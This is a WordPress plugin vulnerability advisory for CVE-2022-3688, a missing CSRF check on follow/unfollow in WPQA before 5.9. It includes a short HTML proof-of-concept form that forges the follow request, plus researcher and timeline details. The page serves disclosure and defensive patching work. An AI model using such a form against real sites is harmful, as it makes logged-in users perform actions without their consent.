WPQA < 5.9 – Follow/Unfollow via CSRF | CVE 2022-3688 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when following and unfollowing users, which could allow attackers to make logged in users perform such actions via CSRF attacks

Proof of Concept

<html>
  <body>
    <form action="https://example.comwp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpqa_following_you" />
      <input type="hidden" name="following_var_id" value="9839" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 5.9

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bikram Kharal

Submitter

Bikram Kharal

Submitter website

http://bikramkharal.com.np/

Submitter twitter

Verified

Yes

WPVDB ID

03b2c6e6-b86e-4143-a84a-7a99060c4848

Timeline

Publicly Published

2022-10-25 (about 1 years ago)

Added

2022-10-25 (about 1 years ago)

Last Updated

2022-10-26 (about 1 years ago)

Other

Published

Title

Published

2024-04-10

Title

BEAR <= 1.1.4.1 & WOLF <= 1.0.8.1 - Cross-Site Request Forgery to Notice Dismissal

Published

2023-11-22

Title

WooCommerce Parcel Pro < 1.6.12 - Cross-Site Request Forgery

Published

2024-04-05

Title

WP Server Health Stats < 1.7.4 - Cross-Site Request Forgery

Published

2023-09-27

Title

Woocommerce ESTO < 2.23.2 - Settings Update via CSRF

Published

2014-08-01

Title

SEO Friendly Images 2.7.4 - seo-friendly-images.php Add Page CSRF